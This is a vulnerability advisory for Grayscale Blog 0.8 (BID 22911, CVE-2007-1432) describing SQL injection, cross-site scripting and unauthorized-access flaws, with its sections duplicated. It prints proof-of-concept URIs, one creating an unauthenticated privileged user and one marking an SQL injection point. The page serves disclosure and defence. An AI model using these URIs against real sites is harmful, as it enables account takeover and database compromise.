Grayscale Blog Multiple Input Validation Vulnerabilities
BID:22911
Info
Grayscale Blog Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 22911 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-1432 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 10 2007 12:00AM |
| Updated: | May 12 2015 07:29PM |
| Credit: | omnipresent is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Grayscale Blog 0.8 |
| Not Vulnerable: | |
Discussion
Grayscale Blog Multiple Input Validation Vulnerabilities
Grayscale Blog is prone to multiple input-validation vulnerabilities, including multiple unauthorized-access issues, SQL-injection issues, and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Grayscale Blog 0.8.0 is affected; other versions may also be vulnerable.
Grayscale Blog is prone to multiple input-validation vulnerabilities, including multiple unauthorized-access issues, SQL-injection issues, and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Grayscale Blog 0.8.0 is affected; other versions may also be vulnerable.
Exploit / POC
Grayscale Blog Multiple Input Validation Vulnerabilities
An attacker can use a browser to exploit any of these issues.
The following proof-of-concept URIs are available:
http://www.example.com/path/scripts/add_users.php?user_loginname=HACK_USER&user_password=HACK_USER&user_real_name=real&[email protected]&user_per
missions=3&user_added_by=1&user_lastmod_by=1&user_allow=1
http://www.example.com/path/detail.php?id=1;[SQL INJECTION]
An attacker can use a browser to exploit any of these issues.
The following proof-of-concept URIs are available:
http://www.example.com/path/scripts/add_users.php?user_loginname=HACK_USER&user_password=HACK_USER&user_real_name=real&[email protected]&user_per
missions=3&user_added_by=1&user_lastmod_by=1&user_allow=1
http://www.example.com/path/detail.php?id=1;[SQL INJECTION]
Solution / Fix
Grayscale Blog Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Grayscale Blog Multiple Input Validation Vulnerabilities
References:
References: